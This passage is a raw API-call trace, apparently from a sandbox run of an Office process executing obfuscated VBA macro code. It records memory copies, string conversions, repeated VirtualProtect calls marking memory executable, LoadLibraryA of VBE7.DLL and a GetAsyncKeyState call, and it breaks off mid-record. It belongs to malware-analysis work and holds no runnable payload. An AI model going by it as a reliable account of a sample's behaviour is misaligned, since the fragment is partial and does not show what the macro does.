out: _Dst=0xb754f48) returned 0xb754f48 [0113.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2ea6, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0113.274] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.274] memcpy (in: _Dst=0xb754f48, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.274] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.274] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.275] memcpy (in: _Dst=0xb754f48, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.275] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.275] memcpy (in: _Dst=0xb754f4c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.275] memcpy (in: _Dst=0xb754f48, _Src=0x197a08, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.275] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.275] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302cb6, cbMultiByte=7, lpWideCharStr=0x197844, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0113.276] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2bfe, cbMultiByte=7, lpWideCharStr=0x1978a4, cchWideChar=8 | out: lpWideCharStr="VarPtr") returned 7 [0113.277] CRetailMalloc_Realloc () returned 0xcac2e38 [0113.278] CRetailMalloc_Realloc () returned 0xc843110 [0113.278] CRetailMalloc_Realloc () returned 0xf5b27c0 [0113.278] CRetailMalloc_Realloc () returned 0xc822fc0 [0113.278] CRetailMalloc_Realloc () returned 0xcad1330 [0113.279] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.279] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.279] memcpy (in: _Dst=0xb754f4c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.279] memcpy (in: _Dst=0xb754f50, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0113.279] memcpy (in: _Dst=0xb754f54, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0113.279] memcpy (in: _Dst=0xb754f54, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0113.279] CRetailMalloc_Realloc () returned 0xc89b080 [0113.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb31812c, cbMultiByte=8, lpWideCharStr=0x11463be8, cchWideChar=18 | out: lpWideCharStr="eS635DDg") returned 8 [0113.279] memcpy (in: _Dst=0xcadc7ec, _Src=0x11463be4, _Size=0x16 | out: _Dst=0xcadc7ec) returned 0xcadc7ec [0113.279] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.280] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb31813e, cbMultiByte=10, lpWideCharStr=0x11463f9a, cchWideChar=22 | out: lpWideCharStr="njymgOf8V5") returned 10 [0113.280] memcpy (in: _Dst=0xcadc808, _Src=0x11463f96, _Size=0x1a | out: _Dst=0xcadc808) returned 0xcadc808 [0113.280] memcpy (in: _Dst=0xb754f4c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.281] memcpy (in: _Dst=0xb754f4c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.281] memcpy (in: _Dst=0xb754f50, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0113.281] memcpy (in: _Dst=0xb754f50, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0113.281] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.281] memcpy (in: _Dst=0xb754f4c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.281] memcpy (in: _Dst=0xb754f50, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0113.281] memcpy (in: _Dst=0xb754f54, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f54) returned 0xb754f54 [0113.281] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.281] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.282] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.282] memcpy (in: _Dst=0xb754f4c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb31819c, cbMultiByte=12, lpWideCharStr=0x114716e4, cchWideChar=26 | out: lpWideCharStr="yYoW04_0LQhK") returned 12 [0113.282] memcpy (in: _Dst=0xcadc828, _Src=0x114716e0, _Size=0x1e | out: _Dst=0xcadc828) returned 0xcadc828 [0113.282] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.282] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.282] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.282] memcpy (in: _Dst=0xb754f4c, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.283] memcpy (in: _Dst=0xb754f4c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2fd6, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0113.283] wcscpy_s (in: _Destination=0xcadc84c, _SizeInWords=0x7, _Source="Remove" | out: _Destination="Remove") returned 0x0 [0113.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb3181c4, cbMultiByte=9, lpWideCharStr=0x1147225e, cchWideChar=20 | out: lpWideCharStr="LHIZQlCw4") returned 9 [0113.283] CRetailMalloc_Alloc () returned 0xcadac78 [0113.283] memcpy (in: _Dst=0xcadac8c, _Src=0x1147225a, _Size=0x18 | out: _Dst=0xcadac8c) returned 0xcadac8c [0113.283] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.284] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.335] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.335] memcpy (in: _Dst=0xb754f4c, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.335] memcpy (in: _Dst=0xb754f4c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.336] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2fd6, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0113.336] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.336] memcpy (in: _Dst=0xb754f4c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0113.336] CRetailMalloc_Alloc () returned 0xc8ffbf8 [0113.337] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0113.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0113.339] memcpy (in: _Dst=0xcaffecc, _Src=0x197ac4, _Size=0x18 | out: _Dst=0xcaffecc) returned 0xcaffecc [0113.339] CRetailMalloc_Realloc () returned 0xcaffc60 [0113.340] CRetailMalloc_Free () returned 0x1 [0113.340] GetCurrentProcess () returned 0xffffffff [0113.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.340] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.340] GetCurrentProcess () returned 0xffffffff [0113.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.340] GetCurrentProcess () returned 0xffffffff [0113.340] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.340] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.341] GetCurrentProcess () returned 0xffffffff [0113.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.341] GetCurrentProcess () returned 0xffffffff [0113.341] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.341] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.341] GetCurrentProcess () returned 0xffffffff [0113.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.342] GetCurrentProcess () returned 0xffffffff [0113.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.342] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.342] GetCurrentProcess () returned 0xffffffff [0113.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.342] GetCurrentProcess () returned 0xffffffff [0113.342] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.342] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.342] GetCurrentProcess () returned 0xffffffff [0113.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.343] GetCurrentProcess () returned 0xffffffff [0113.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.343] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.343] GetCurrentProcess () returned 0xffffffff [0113.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.343] GetCurrentProcess () returned 0xffffffff [0113.343] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.343] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.344] GetCurrentProcess () returned 0xffffffff [0113.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.344] GetCurrentProcess () returned 0xffffffff [0113.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.344] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.344] GetCurrentProcess () returned 0xffffffff [0113.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.344] GetCurrentProcess () returned 0xffffffff [0113.344] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.344] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.345] GetCurrentProcess () returned 0xffffffff [0113.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.345] GetCurrentProcess () returned 0xffffffff [0113.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.345] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.345] GetCurrentProcess () returned 0xffffffff [0113.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.345] GetCurrentProcess () returned 0xffffffff [0113.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.345] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.346] GetCurrentProcess () returned 0xffffffff [0113.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.346] GetCurrentProcess () returned 0xffffffff [0113.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.346] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.347] GetCurrentProcess () returned 0xffffffff [0113.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.347] GetCurrentProcess () returned 0xffffffff [0113.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.347] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.348] GetCurrentProcess () returned 0xffffffff [0113.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.348] GetCurrentProcess () returned 0xffffffff [0113.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.348] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.348] GetCurrentProcess () returned 0xffffffff [0113.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.348] GetCurrentProcess () returned 0xffffffff [0113.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.348] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.349] GetCurrentProcess () returned 0xffffffff [0113.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.349] GetCurrentProcess () returned 0xffffffff [0113.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.349] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.349] GetCurrentProcess () returned 0xffffffff [0113.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.350] GetCurrentProcess () returned 0xffffffff [0113.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.350] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.350] GetCurrentProcess () returned 0xffffffff [0113.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.350] GetCurrentProcess () returned 0xffffffff [0113.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.350] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.351] GetCurrentProcess () returned 0xffffffff [0113.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.351] GetCurrentProcess () returned 0xffffffff [0113.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.351] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.351] GetCurrentProcess () returned 0xffffffff [0113.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.351] GetCurrentProcess () returned 0xffffffff [0113.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.351] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.352] GetCurrentProcess () returned 0xffffffff [0113.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.352] GetCurrentProcess () returned 0xffffffff [0113.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.352] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.352] GetCurrentProcess () returned 0xffffffff [0113.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.352] GetCurrentProcess () returned 0xffffffff [0113.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.352] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.353] GetCurrentProcess () returned 0xffffffff [0113.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.353] GetCurrentProcess () returned 0xffffffff [0113.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.353] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.353] GetCurrentProcess () returned 0xffffffff [0113.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.354] GetCurrentProcess () returned 0xffffffff [0113.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.354] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.354] GetCurrentProcess () returned 0xffffffff [0113.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.354] GetCurrentProcess () returned 0xffffffff [0113.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.354] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.355] GetCurrentProcess () returned 0xffffffff [0113.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.355] GetCurrentProcess () returned 0xffffffff [0113.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.355] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.355] GetCurrentProcess () returned 0xffffffff [0113.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.355] GetCurrentProcess () returned 0xffffffff [0113.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.355] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.356] GetCurrentProcess () returned 0xffffffff [0113.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.356] GetCurrentProcess () returned 0xffffffff [0113.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.356] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.357] GetCurrentProcess () returned 0xffffffff [0113.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.357] GetCurrentProcess () returned 0xffffffff [0113.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.357] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.357] GetCurrentProcess () returned 0xffffffff [0113.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.357] GetCurrentProcess () returned 0xffffffff [0113.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.357] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.358] GetCurrentProcess () returned 0xffffffff [0113.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.358] GetCurrentProcess () returned 0xffffffff [0113.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.358] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0113.358] GetCurrentProcess () returned 0xffffffff [0113.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.358] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.396] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0113.396] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0113.397] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.397] GetProcAddress (hModule=0x695d0000, lpProcName=0x284) returned 0x69605c5c [0113.397] GetCurrentProcess () returned 0xffffffff [0113.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x88f3178, dwSize=0x19) returned 1 [0113.398] VirtualProtect (in: lpAddress=0x88f3178, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0113.398] GetCurrentProcess () returned 0xffffffff [0113.398] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadaf20, dwSize=0x19) returned 1 [0113.398] VirtualProtect (in: lpAddress=0xcadaf20, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0113.399] GetCurrentProcess () returned 0xffffffff [0113.399] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadaecc, dwSize=0x19) returned 1 [0113.399] VirtualProtect (in: lpAddress=0xcadaecc, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x40) returned 1 [0113.400] GetAsyncKeyState (vKey=3) returned 0 [0113.400] CRetailMalloc_Alloc () returned 0xcb00838 [0113.400] memcpy (in: _Dst=0xb754f48, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.400] memcpy (in: _Dst=0xcb00858, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb00858) returned 0xcb00858 [0113.400] CRetailMalloc_Realloc () returned 0xcb00838 [0113.400] CRetailMalloc_Free () returned 0x1 [0113.401] GetCurrentProcess () returned 0xffffffff [0113.401] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.401] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.401] GetCurrentProcess () returned 0xffffffff [0113.401] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.401] GetCurrentProcess () returned 0xffffffff [0113.401] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.401] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.402] GetCurrentProcess () returned 0xffffffff [0113.402] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.402] GetCurrentProcess () returned 0xffffffff [0113.402] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.402] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.402] GetCurrentProcess () returned 0xffffffff [0113.402] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.402] GetCurrentProcess () returned 0xffffffff [0113.403] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.403] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.403] GetCurrentProcess () returned 0xffffffff [0113.403] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 